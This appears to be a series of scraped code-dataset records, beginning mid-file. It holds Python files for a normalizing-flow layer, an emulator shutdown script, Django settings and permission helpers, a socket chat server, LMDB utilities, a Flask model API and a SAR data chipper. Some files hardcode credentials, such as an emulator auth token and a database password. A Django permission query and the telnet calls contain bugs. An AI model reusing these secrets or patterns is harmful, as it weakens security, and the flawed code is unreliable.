\n keys ('s','t').\n\n Attributes:\n s_net (MultiLayerPerceptron) : Neural net for scale.\n t_net (MultiLayerPerceptron) : Neural net for translation.\n mask (torch.tensor): Mask of arrays. \n\n \"\"\"\n def __init__(self, dim, mask, s_t_net):\n super(CouplingLayer, self).__init__()\n\n self.s_net = s_t_net['s']\n self.t_net = s_t_net['t']\n self.mask = mask\n self.dtype = mask.dtype\n\n def forward(self, x, sum_logdet_jacobian, reverse):\n if(sum_logdet_jacobian is None):\n device = x.device \n sum_logdet_jacobian = torch.zeros(\n x.size(0),\n dtype=self.dtype, \n device=device,\n requires_grad=True\n )\n b = self.mask.to(x.device)\n x_b = x * b\n s = self.s_net(x_b)\n t = self.t_net(x_b)\n s = s * (1 - b)\n t = t * (1 - b)\n\n if not reverse:\n exp_s = s.exp()\n if torch.isnan(exp_s).any():\n raise RuntimeError('Scale factor has NaN entries')\n x = x * exp_s + t\n sum_logdet_jacobian = sum_logdet_jacobian + s.view(s.size(0), -1).sum(-1)\n else:\n inv_exp_s = s.mul(-1).exp()\n if torch.isnan(inv_exp_s).any():\n raise RuntimeError('Scale factor has NaN entries')\n x = (x - t) * inv_exp_s\n sum_logdet_jacobian = sum_logdet_jacobian - s.view(s.size(0), -1).sum(-1)\n\n return x, sum_logdet_jacobian\n\n","sub_path":"neuct/neuct/flows/real_nvp/coupling_layer.py","file_name":"coupling_layer.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580168251","text":"import sys\nimport subprocess\nimport json\nimport telnetlib\nimport time\n\ndef listConnected():\n listConnected = ['adb', 'devices']\n devices = subprocess.Popen(listConnected, stdout=subprocess.PIPE).communicate()[0].decode(\"utf-8\")\n deviceList = devices.split()\n filteredList = list(filter(lambda x : \"emulator\" in x, deviceList))\n return filteredList\n\ndef getName(dev):\n port = str(dev).split('-')[1]\n HOST = 'localhost'\n # AUTH = 'NwhG3frGXDUGGYBz'\n AUTH = '555KjfyUBwIiO+h4'\n tel = telnetlib.Telnet(HOST, port)\n time.sleep(1)\n output = tel.read_very_eager()\n # print(str(output))\n tel.write('auth ' + AUTH + '\\n')\n time.sleep(1)\n tel.write(\"avd name + \\n\")\n time.sleep(1)\n output = tel.read_very_eager()\n # print(str(output))\n\n output = output.split(\"OK\")\n return str(output[1].strip())\n\ninp = sys.argv[1]\n\nwith open(inp) as f:\n jsonList = json.loads(f.read())\n\nnameList = []\n\nfor device in jsonList:\n nameList.append(device['name'])\n\ndevices = listConnected()\n\nif (len(devices) == 0):\n exit()\n\n\nfor dev in devices:\n stop = ['adb', '-s', str(dev), 'emu', 'kill']\n devName = getName(dev)\n if (devName in nameList):\n subprocess.Popen(stop).communicate()\n\n","sub_path":"stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597059958","text":"# -*- coding: utf-8 -*-\n# Django settings for skeleton project.\n\nfrom thepian.conf import structure\nfrom os.path import join\n\nDEVELOPING = structure.DEVELOPING\nDEBUG = DEVELOPING\nTEMPLATE_DEBUG = DEBUG\n\n# Possible choices are: ''|'simple'|'recaptcha'\n# To utilize recaptcha you must get public/private keys\n# from http://recaptcha.net/\nCAPTCHA='simple'\nRECAPTCHA_PUBLIC_KEY = ''\nRECAPTCHA_PRIVATE_KEY =''\n\nADMINS = structure.ADMINS\nMANAGERS = ADMINS\n\nif DEVELOPING: \n DATABASE_ENGINE = 'sqlite3'\n DATABASE_NAME = join(structure.PROJECT_DIR,'testdb')\n DATABASE_USER = ''\n DATABASE_PASSWORD = ''\n DATABASE_HOST = ''\n 
DATABASE_PORT = ''\nelse:\n DATABASE_ENGINE = 'postgresql_psycopg2'\n DATABASE_NAME = 'skeleton'\n DATABASE_USER = 'skeleton'\n DATABASE_PASSWORD = 'thepian'\n DATABASE_HOST = ''\n DATABASE_PORT = '' \n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/London'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-uk'\n\nSITE_ID = 1\nSITE_TITLE = 'skeleton Site'\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = 'http://media.skeleton.com'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\nADMIN_MEDIA_PREFIX = MEDIA_URL+'/admin/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.core.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \n #\"notification.context_processors.notification\",\n #\"announcements.context_processors.site_wide_announcements\",\n #\"messages.context_processors.inbox\",\n \"theapps.supervisor.context_processors.vars\",\n)\n\n#AUTHENTICATION_BACKENDS = (\n# 'django.contrib.auth.backends.ModelBackend',\n# 'accounts.backends.CommentApprovingBackend',\n# 'accounts.backends.EmailBackend',\n# 'openidconsumer.backend.OpenidBackend',\n#)\n\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'theapps.supervisor.middleware.SiteMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'django_openidconsumer.middleware.OpenIDMiddleware',\n 'theapps.supervisor.middleware.DeviceMiddleware',\n)\n\nROOT_URLCONF = 'urls' \n#URLCONFS = {\n# 'www':'conf.urls',\n# 'media':'devonly.media_urls',\n# #TODO 'aa':'theapps.assets.shard_urls',\n#} \n\nAPPEND_SLASH = True\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n structure.TEMPLATES_DIR,\n # structure.SAMPLE_TEMPLATES_DIR,\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'django.contrib.humanize',\n 'django.contrib.markup',\n \n 'theapps.about',\n 'theapps.samples',\n 'theapps.media',\n 'theapps.sitemaps',\n \n #'notification',\n 'extensions',\n #'friends',\n 
'mailer',\n #'messages',\n #'announcements',\n 'django_openid',\n 'oembed',\n #'gravatar', # This needs to go before threadedcomments.\n 'threadedcomments',\n 'timezones',\n 'feedutil',\n \n 'django_evolution',\n 'theapps.tagging',\n 'theapps.blog',\n \n 'about',\n 'theapps.account',\n # openidconsumer openidserver recapcha debug\n)\n\n#TODO fox this with proper url /account/profile ?\nABSOLUTE_URL_OVERRIDES = {\n \"auth.user\": lambda o: \"/users/%s/\" % o.username,\n}\n\n# AUTH_USER_MODULE = 'account.user_model.User'\n# AUTH_PROFILE_MODELS = ('account.Profile',)\n# AUTH_PROFILE_MODULE = 'account.Profile'\n\nEMAIL_HOST = 'localhost'\nSERVER_EMAIL = \"server@thepia.net\"\n\nDEFAULT_FROM_EMAIL = 'confirmations@skeleton.com'\n\nEMAIL_CONFIRMATION_DAYS = 2\nEMAIL_DEBUG = DEBUG\nCONTACT_EMAIL = \"feedback@skeleton.com\"\nLOGIN_URL = \"/account/login\"\n\nLOGGING_OUTPUT_ENABLED = True\nLOGGING_SHOW_METRICS = True\nLOGGING_LOG_SQL = True\n\nINTERNAL_IPS = ( '127.0.0.1', ) + structure.DEV_MACHINES\n\nDEFAULT_CHARSET = 'utf-8'\n\n# Record page generation statistics and put spread, then pull on demand, flagging page with identifier\nTRACE = DEBUG\n\nugettext = lambda s: s\nLANGUAGES = (\n ('en', u'English'),\n ('de', u'Deutsch'),\n ('es', u'Español'),\n ('fr', u'Français'),\n ('sv', u'Svenska'),\n ('pt-br', u'Português brasileiro'),\n)\n\n# URCHIN_ID = \"ua-...\"\n\nCACHE_BACKEND = \"locmem:///?max_entries=3000\"\nFEEDUTIL_SUMMARY_LEN = 60*7 # 7 hours\n\ntry:\n from localsettings import *\nexcept ImportError:\n pass\n\n\n\n\n","sub_path":"conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"565788976","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.models import Permission\nfrom django.db import IntegrityError\nfrom django.db import models\nfrom django.db.models import Q\n\n\ndef add_group_permissions(group_id, codenames):\n \"\"\"\n Add permissions to a group\n\n :param group_id: group to add permissions to\n :param codenames: sequence of permission codenames (assumed permission already exists)\n :param allow_duplicates: Whether to throw an error if duplicate permissions assigned (defaults to false)\n :return:\n \"\"\"\n group = Group.objects.get(pk=group_id)\n\n permissions = list(Permission.objects.filter(codename__in=codenames))\n\n # Check that the permissions actually exist\n missing = set(codenames) - set(p.codename for p in permissions)\n if len(missing):\n raise Permission.DoesNotExist(list(missing)[0])\n\n group.permissions.add(*permissions)\n\n\ndef get_users_with_permission(permission):\n return get_users_with_permissions((permission,))\n\n\ndef get_users_with_permissions(permissions):\n \"\"\"\n Assumes authtools is the user model, grabs all users with specified static permissions\n :param permissions: permissions codenames to check\n :return: queryset of users with any of the listed permissions (via a group or directly)\n \"\"\"\n query = Q(False)\n for permission in permissions:\n (app_label, codename) = permission.split('.', 1)\n query = query | Q(codename=codename, app_label=app_label)\n permissions = Permission.objects.filter(Q).values('pk')\n User = get_user_model()\n users = User.objects.filter(\n Q(user_permissions__pk__in=permissions) |\n Q(user__groups__permissions__pk__in=permissions)\n ).distinct()\n return users\n\n\ndef 
combine_querysets_as_manager(*queryset_classes):\n \"\"\"\n Replacement for django_permanent.managers.MultiPassThroughManager which no longer works in django 1.8\n\n Returns a new Manager instance that passes through calls to multiple underlying queryset_classes via inheritance\n\n :param queryset_classes: Queryset cla\n :return: class\n \"\"\"\n name = \"\".join([cls.__name__ for cls in queryset_classes])\n return type(name, queryset_classes, {}).as_manager()\n\n\nclass NoDeleteQuerySet(models.QuerySet):\n def delete(self, force=False):\n if force:\n return super(NoDeleteQuerySet, self).delete()\n raise IntegrityError(\"Instances of model '%s' are marked as undeletable\" % self.__class__.__name__)\n\n\nclass NoDeleteModel(models.Model):\n \"\"\"\n A model that cannot be deleted.\n\n Note that this is an abstract Model, please read\n https://docs.djangoproject.com/en/1.8/topics/db/managers/#custom-managers-and-model-inheritance\n\n If you wish to override the default manager, you need to combine the queryset like so:\n\n class MyModel(NoDeleteModel):\n objects = combine_querysets_as_manager(NoDeleteQuerySet, MyQuerySet)\n\n If you do not do this then individual record deletions will be blocked, but not deletions via a queryset\n \"\"\"\n objects = models.Manager.from_queryset(NoDeleteQuerySet)\n\n def delete(self, *args, **kwargs):\n if kwargs.get('force'):\n return super(NoDeleteModel, self).delete(*args, **kwargs)\n raise IntegrityError(\"Instances of model '%s' are marked as undeletable\" % self.__class__.__name__)\n\n class Meta:\n abstract = True\n","sub_path":"nac/allianceutils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106657082","text":"\"\"\"\n@Project :20180813\n@Time :2018/8/13 9:20\n@Author :Zhenxian\n@File :server_.py\n@Software :PyCharm\n\"\"\"\n\nimport socket\n\nsk = socket.socket()\nsk.bind(('127.0.0.1', 65534))\nsk.listen()\ncon, add = sk.accept()\n\nwhile 1:\n msg = con.recv(1024).decode('utf-8')\n print(msg)\n if msg == 'q':\n break\n msg = input('>>>')\n con.send(msg.encode('utf-8'))\n if msg == 'q':\n break\n\ncon.close()\nsk.close()\n","sub_path":"20180813/server_.py","file_name":"server_.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"419185748","text":"\"\"\"\nCalculator from codereview ( cleaning it )\nhttps://codereview.stackexchange.com/questions/31286/py\nthon-calculator-script?newreg=a64e20a154d54122a704bc5e22ad9dfa\n\n\"\"\"\n\ntheList = [\"add\",\"multiply\",\n \"divide\",\"subtract\"]\n\ndef getNumbers():\n global x\n global y\n while True:\n try:\n x = int(input(\"First number: \"))\n break\n except ValueError:\n print(\"Make sure to enter a number.\")\n while True:\n try:\n y = int(input(\"Second number: \"))\n break\n except ValueError:\n print(\"Make sure to enter a number...\")\n\nwhile True:\n operation = input(\"What would you like to do? 
Multiply/Divide\" +\n \"/Add/Subtract \")\n if operation.lower() in theList:\n break\n else:\n print(\"That was not an option..\")\n\nif operation.lower() == \"multiply\": # If operation is equal to \"multiply\"\n getNumbers()\n z = x * y\n print(z)\nelif operation.lower() == \"subtract\": # If operation is equal to \"substract\"\n getNumbers()\n z = x - y\n print(z)\nelif operation.lower() == \"add\": # If operation is equal to \"add\"\n getNumbers()\n z = x + y\n print(z)\nelif operation.lower() == \"divide\": # If operation is equal to \"divide\"\n getNumbers()\n z = x / y\n print(z)\n\n","sub_path":"DAY11/calCleaned.py","file_name":"calCleaned.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"269549905","text":"import time\n\nline = [((0, 0), (3, 0))]\nscore = [25,0]\n\nrp_lt = [line, score]\n\n\ndef save_writing(rp_lt,line, score):\n date = time.strftime(\"%d_%m-%H_%M_%S\")\n monfichier = open((date)+'.txt', 'w')\n\n for x in rp_lt:\n x = str(x)\n monfichier.write(x)\n monfichier.write(\"\\n\")\n\n monfichier.close\n\n print(\"Data got success fully saved\")\n\n\ndef save_reading():\n monfichier = open('save.txt', 'r')\n\n line = monfichier.readline()\n score = monfichier.readline()\n\n monfichier.close\n\n return line,score\n\n\n\n\nnt = str(input(\"w or r\"))\n\nif nt==\"w\":\n save_writing(rp_lt,line, score)\n\nif nt==\"r\":\n line, score = save_reading()\n print(line,score)\n\n","sub_path":"sav.py","file_name":"sav.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"103429148","text":"# coding=utf-8\n\nimport sys\nimport os\nimport lmdb\nimport numpy as np\nfrom train_vqvae import get_key_path\n\n\ndef build_lmdb_from_encode_result(args):\n input_dir = args[0]\n output_dir = args[1]\n\n lmdb_env = lmdb.open(output_dir, map_size=1099511627776)\n txn = lmdb_env.begin(write=True)\n\n linecnt = 0\n for f in os.listdir(input_dir):\n if f.startswith(\".\"):\n continue\n for line in open(os.path.join(input_dir, f)):\n linecnt += 1\n if linecnt % 10000 == 0:\n print(\"{} done\".format(linecnt), file=sys.stderr, flush=True)\n arr = line.rstrip(\"\\r\\n\").split(\"\\t\")\n key = arr[0]\n val = np.asarray([int(x) for x in arr[1].split(\",\")], dtype=np.int16)\n txn.put(key.encode(\"utf-8\"), val.tobytes())\n txn.commit()\n lmdb_env.close()\n\n\ndef build_img_lmdb(args):\n img_root_path = args[0]\n img_key_list_file = args[1]\n output_dir = args[2]\n\n lmdb_env = lmdb.open(output_dir, map_size=1099511627776)\n txn = lmdb_env.begin(write=True)\n\n linecnt = 0\n commit_cache = 0\n for line in open(img_key_list_file):\n linecnt += 1\n if linecnt % 10000 == 0:\n print(\"{} done\".format(linecnt), file=sys.stderr, flush=True)\n img_key = line.strip()\n key_enc = img_key.encode(\"utf-8\")\n img_path = get_key_path(img_root_path, img_key)\n try:\n img = open(img_path, \"rb\").read()\n except:\n continue\n txn.put(key_enc, img)\n commit_cache += 1\n if commit_cache > 10000:\n txn.commit()\n txn = lmdb_env.begin(write=True)\n commit_cache = 0\n txn.commit()\n lmdb_env.close()\n\n\nif __name__ == \"__main__\":\n globals()[sys.argv[1]](sys.argv[2:])","sub_path":"lmdb_utils.py","file_name":"lmdb_utils.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"203649000","text":"import argparse\nfrom flask import Flask, 
jsonify, request, render_template, send_from_directory\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\n\nfrom scripts.supervised_model_utils import load_model, score_model, train_model\nfrom scripts import ROOT_DIR, AVAILABLE_COUNTRIES\n\nLOG_DIR = os.path.join(ROOT_DIR, \"logs\")\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef landing():\n return \"Hi there!\"\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n \"\"\"\n basic predict function for the API\n \"\"\"\n\n # input checking\n if not request.json:\n print(\"ERROR: API (predict): did not receive request data.\")\n return jsonify([])\n\n if 'query' not in request.json:\n print(\"ERROR API (predict): received request, but no 'query' found within.\")\n return jsonify([])\n\n if not isinstance(request.json[\"query\"], list):\n print(\"ERROR API (predict): query must be a list containing a dictionary having 'country'\"\n \" and 'starting_dates' as keys.\")\n return jsonify([])\n\n if not isinstance(request.json[\"query\"][0], dict):\n print(\"ERROR API (predict): query must be a list containing a dictionary having 'country'\"\n \" and 'starting_dates' as keys.\")\n return jsonify([])\n\n if \"country\" not in request.json[\"query\"][0]:\n print(\"ERROR API (predict): missing 'country' specification.\")\n return jsonify([])\n\n if request.json[\"query\"][0][\"country\"] not in AVAILABLE_COUNTRIES:\n print(\"ERROR API (predict): acceptable countries are\", *AVAILABLE_COUNTRIES)\n return jsonify([])\n\n if \"starting_dates\" not in request.json[\"query\"][0]:\n print(\"ERROR API (predict): missing 'starting_dates' specification.\")\n return jsonify([])\n\n try:\n _ = [pd.Timestamp(sd) for sd in request.json[\"query\"][0][\"starting_dates\"]]\n except ValueError:\n print(\"ERROR API (predict): 'starting_dates' cannot be parsed correctly as dates.\")\n return jsonify([])\n\n # extract the query\n query = request.json['query'][0]\n\n try:\n model, model_name = load_model(country_name=query['country'])\n except FileNotFoundError:\n print(\"ERROR: no model is available for this country. Train a model and retry.\")\n return jsonify([])\n\n _result = score_model(query['starting_dates'], model_name)\n result = []\n\n # convert numpy objects to ensure they are serializable\n for item in _result:\n if isinstance(item, np.ndarray):\n result.append(item.tolist())\n else:\n result.append(item)\n\n return jsonify(result)\n\n\n@app.route('/train', methods=['GET', 'POST'])\ndef train():\n\n # check for request data\n if not request.json:\n print(\"ERROR: API (train): did not receive request data.\")\n return jsonify(False)\n\n if 'query' not in request.json:\n print(\"ERROR API (train): received request, but no 'query' found within.\")\n return jsonify([])\n\n if 'country' not in request.json['query'][0]:\n print(\"ERROR API (train): missing 'country' field in query.\")\n return jsonify([])\n\n if request.json[\"query\"][0][\"country\"] not in AVAILABLE_COUNTRIES:\n print(\"ERROR API (predict): acceptable countries are\", *AVAILABLE_COUNTRIES)\n return jsonify([])\n\n query = request.json['query'][0]\n\n test = query.get('test')\n if test is None:\n test = False\n\n model = train_model(query['country'], query.get('param_dim'), test)\n print(\"... 
training complete\")\n\n return jsonify(True)\n\n\n@app.route('/logs/', methods=['GET'])\ndef logs(filename):\n \"\"\"\n API endpoint to get logs\n \"\"\"\n if not re.search(\".log\", filename):\n print(\"ERROR: API (log): file requested was not a log file: {}.\".format(filename))\n return jsonify([])\n\n if not os.path.isdir(LOG_DIR):\n print(\"ERROR: API (log): cannot find log dir.\")\n return jsonify([])\n\n file_path = os.path.join(LOG_DIR, filename)\n if not os.path.exists(file_path):\n print(\"ERROR: API (log): file requested could not be found: {}.\".format(filename))\n return jsonify([])\n\n return send_from_directory(LOG_DIR, filename, as_attachment=True)\n\n\nif __name__ == '__main__':\n\n # parse arguments for debug mode\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-d\", \"--debug\", action=\"store_true\", help=\"debug flask\")\n args = vars(ap.parse_args())\n\n if args[\"debug\"]:\n app.run(debug=True, port=8080)\n else:\n app.run(host='0.0.0.0', threaded=True, port=8080)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"119722687","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThe base elements for reading and writing complex data files.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport logging\nfrom typing import Union, Tuple\n\nimport numpy\n\nfrom .sicd_elements.SICD import SICDType\nfrom .sicd_elements.ImageCreation import ImageCreationType\nfrom ...__about__ import __title__, __version__\n\ninteger_types = (int, )\nint_func = int\nif sys.version_info[0] < 3:\n # noinspection PyUnresolvedReferences\n int_func = long # to accommodate 32-bit python 2\n # noinspection PyUnresolvedReferences\n integer_types = (int, long)\n\n__classification__ = \"UNCLASSIFIED\"\n__author__ = \"Thomas McCullough\"\n\n\nclass BaseChipper(object):\n \"\"\"\n Base class defining basic functionality for the literal extraction of data\n from a file. The intent of this class is to be a callable in the following form:\n :code:`data = BaseChipper(entry1, entry2)`, where each entry is a tuple or\n int of the form `[[[start], stop,] step]`.\n\n Similarly, we are able to use more traditional Python slicing syntax\n\n .. code-block::\n\n data = BaseChipper[slice1[, slice2]]\n\n **Extension Requirement:** This provides the basic implementation for the work\n flow, but it is **required** that any extension provide a concrete implementation\n for actually reading from the raw file in `read_raw_fun`.\n\n **Extension Consideration:** It is possible that the basic functionality for\n conversion of raw data to complex data requires something more nuanced than\n the default provided in the `_data_to_complex` method.\n \"\"\"\n __slots__ = ('_data_size', '_complex_type', '_symmetry')\n\n def __init__(self, data_size, symmetry=(False, False, False), complex_type=False):\n \"\"\"\n\n Parameters\n ----------\n data_size : tuple\n The full size of the data *after* any required transformation. See\n `data_size` property.\n symmetry : tuple\n Describes any required data transformation. 
See the `symmetry` property.\n complex_type : callable|bool\n For complex type handling.\n If callable, then this is expected to transform the raw data to the complex data.\n If this evaluates to `True`, then the assumption is that real/imaginary\n components are stored in adjacent bands, which will be combined into a\n single band upon extraction.\n \"\"\"\n\n if not (isinstance(complex_type, bool) or callable(complex_type)):\n raise ValueError('complex-type must be a boolean or a callable')\n self._complex_type = complex_type\n\n if not isinstance(symmetry, tuple):\n symmetry = tuple(symmetry)\n if len(symmetry) != 3:\n raise ValueError(\n 'The symmetry parameter must have length 3, and got {}.'.format(symmetry))\n self._symmetry = tuple([bool(entry) for entry in symmetry])\n\n if not isinstance(data_size, tuple):\n data_size = tuple(data_size)\n if len(data_size) != 2:\n raise ValueError(\n 'The data_size parameter must have length 2, and got {}.'.format(data_size))\n data_size = (int_func(data_size[0]), int_func(data_size[1]))\n if data_size[0] < 0 or data_size[1] < 0:\n raise ValueError('All entries of data_size {} must be non-negative.'.format(data_size))\n if self._symmetry[2]:\n self._data_size = (data_size[1], data_size[0])\n else:\n self._data_size = data_size\n\n @property\n def symmetry(self):\n \"\"\"\n Tuple[bool, bool, bool]: Entries of the form (`flip1`, `flip2`, `swap_axes`).\n This describes necessary symmetry transformation to be performed to convert\n from raw (file storage) order into the order expected (analysis order).\n\n * `flip1=True` - we reverse order in the first axis, wrt raw order.\n\n * `flip2=True` - we reverse order in the second axis, wrt raw order).\n\n * `swap_axes=True` - we switch the two axes, after any required flipping.\n \"\"\"\n\n return self._symmetry\n\n @property\n def data_size(self):\n \"\"\"\n Tuple[int, int]: Two element tuple of the form `(rows, columns)`, which provides the\n size of the data, after any necessary symmetry transformations have been applied.\n Note that this excludes the number of bands in the image.\n \"\"\"\n\n return self._data_size\n\n def __call__(self, range1, range2):\n \"\"\"\n Reads and fetches data. Note that :code:`chipper(range1, range2)` is an alias\n for :code:`chipper.read_chip(range1, range2)`.\n\n Parameters\n ----------\n range1 : None|int|tuple\n range2 : none|int|tuple\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n data = self._read_raw_fun(range1, range2)\n data = self._data_to_complex(data)\n\n # make a one band image flat\n if data.ndim == 3 and data.shape[2] == 1:\n data = numpy.reshape(data, data.shape[:-1])\n\n data = self._reorder_data(data)\n return data\n\n def __getitem__(self, item):\n \"\"\"\n Reads and returns data using more traditional to python slice functionality.\n After slice interpretation, this is analogous to :func:`__call__` or :func:`read_chip`.\n\n Parameters\n ----------\n item : None|int|slice|tuple\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n range1, range2 = self._slice_to_args(item)\n return self.__call__(range1, range2)\n\n @staticmethod\n def _slice_to_args(item):\n # type: (Union[None, int, slice, tuple]) -> tuple\n def parse(entry):\n if isinstance(entry, integer_types):\n return entry, entry+1, 1\n if isinstance(entry, slice):\n return entry.start, entry.stop, entry.step\n\n # this input is assumed to come from slice parsing\n if isinstance(item, tuple) and len(item) > 2:\n raise ValueError(\n 'Chipper received slice argument {}. 
We cannot slice on more than two dimensions.'.format(item))\n if isinstance(item, tuple):\n return parse(item[0]), parse(item[1])\n else:\n return parse(item), None\n\n def _reorder_arguments(self, range1, range2):\n \"\"\"\n Reinterpret the range arguments into actual \"physical\" arguments of memory,\n in light of the symmetry attribute.\n\n Parameters\n ----------\n range1 : None|int|tuple\n * if `None`, then the range is not limited in first axis\n * if `int` = step size\n * if (`int`, `int`) = `end`, `step size`\n * if (`int`, `int`, `int`) = `start`, `stop`, `step size`\n range2 : None|int|tuple\n same as `range1`, except for the second axis.\n\n Returns\n -------\n None|int|tuple\n actual range 1 - in light of `range1`, `range2` and symmetry\n None|int|tuple\n actual range 2 - in light of `range1`, `range2` and symmetry\n \"\"\"\n\n def extract(arg, siz):\n start, stop, step = None, None, None\n if isinstance(arg, integer_types):\n step = arg\n else:\n # NB: following this pattern to avoid confused pycharm inspection\n if len(arg) == 1:\n step = arg[0]\n elif len(arg) == 2:\n stop, step = arg\n elif len(arg) == 3:\n start, stop, step = arg\n start = 0 if start is None else int_func(start)\n stop = siz if stop is None else int_func(stop)\n step = 1 if step is None else int_func(step)\n # basic validity check\n if not (-siz < start < siz):\n raise ValueError(\n 'Range argument {} has extracted start {}, which is required '\n 'to be in the range [0, {})'.format(arg, start, siz))\n if not (-siz < stop <= siz):\n raise ValueError(\n 'Range argument {} has extracted \"stop\" {}, which is required '\n 'to be in the range [0, {}]'.format(arg, stop, siz))\n if not ((0 < step < siz) or (-siz < step < 0)):\n raise ValueError(\n 'Range argument {} has extracted step {}, for an axis of length '\n '{}'.format(arg, start, siz))\n if ((step < 0) and (stop > start)) or ((step > 0) and (start > stop)):\n raise ValueError(\n 'Range argument {} has extracted start {}, stop {}, step {}, '\n 'which is not valid.'.format(arg, start, stop, step))\n\n # reform negative values for start/stop appropriately\n if start < 0:\n start += siz\n if stop < 0:\n stop += siz\n return start, stop, step\n\n def reverse_arg(arg, siz):\n start, stop, step = extract(arg, siz)\n # read backwards\n return (siz - 1) - start, (siz - 1) - stop, -step\n\n if isinstance(range1, (numpy.ndarray, list)):\n range1 = tuple(range1)\n if isinstance(range2, (numpy.ndarray, list)):\n range2 = tuple(range2)\n\n if not (range1 is None or isinstance(range1, integer_types) or isinstance(range1, tuple)):\n raise TypeError('range1 is of type {}, but must be an instance of None, '\n 'int or tuple.'.format(range1))\n if isinstance(range1, tuple) and len(range1) > 3:\n raise TypeError('range1 must have no more than 3 entries, received {}.'.format(range1))\n\n if not (range2 is None or isinstance(range2, integer_types) or isinstance(range2, tuple)):\n raise TypeError('range2 is of type {}, but must be an instance of None, '\n 'int or tuple.'.format(range2))\n if isinstance(range2, tuple) and len(range2) > 3:\n raise TypeError('range2 must have no more than 3 entries, received {}.'.format(range2))\n\n # validate the first range\n if self._symmetry[0]:\n real_arg1 = reverse_arg(range1, self._data_size[0])\n else:\n real_arg1 = extract(range1, self._data_size[0])\n # validate the second range\n if self._symmetry[1]:\n real_arg2 = reverse_arg(range2, self._data_size[1])\n else:\n real_arg2 = extract(range2, self._data_size[1])\n\n # switch the axes 
symmetry dictates\n real_arg1, real_arg2 = (real_arg2, real_arg1) if self._symmetry[2] else (real_arg1, real_arg2)\n return real_arg1, real_arg2\n\n def _data_to_complex(self, data):\n # type: (numpy.ndarray) -> numpy.ndarray\n if callable(self._complex_type):\n return self._complex_type(data) # is this actually necessary?\n elif self._complex_type:\n out = numpy.zeros((data.shape[0], data.shape[1], int_func(data.shape[2]/2)), dtype=numpy.complex64)\n out.real = data[:, :, 0::2]\n out.imag = data[:, :, 1::2]\n return out\n else:\n # nothing to be done\n return data\n\n def _reorder_data(self, data):\n # type: (numpy.ndarray) -> numpy.ndarray\n if self._symmetry[2]:\n data = numpy.swapaxes(data, 1, 0)\n return data\n\n def _read_raw_fun(self, range1, range2):\n \"\"\"\n Reads data as stored in a file, before any complex data and symmetry\n transformations are applied. The one potential exception to the \"raw\"\n file orientation of the data is that bands will always be returned in the\n first dimension (data[n,:,:] is the nth band -- \"band sequential\" or BSQ,\n as stored in Python's memory), regardless of how the data is stored in\n the file.\n\n Parameters\n ----------\n range1 : None|int|tuple\n * if `None`, then the range is not limited in first axis\n * if `int` = step size\n * if (`int`, `int`) = `end`, `step size`\n * if (`int`, `int`, `int`) = `start`, `stop`, `step size`\n range2 : None|int|tuple\n same as `range1`, except for the second axis.\n\n Returns\n -------\n 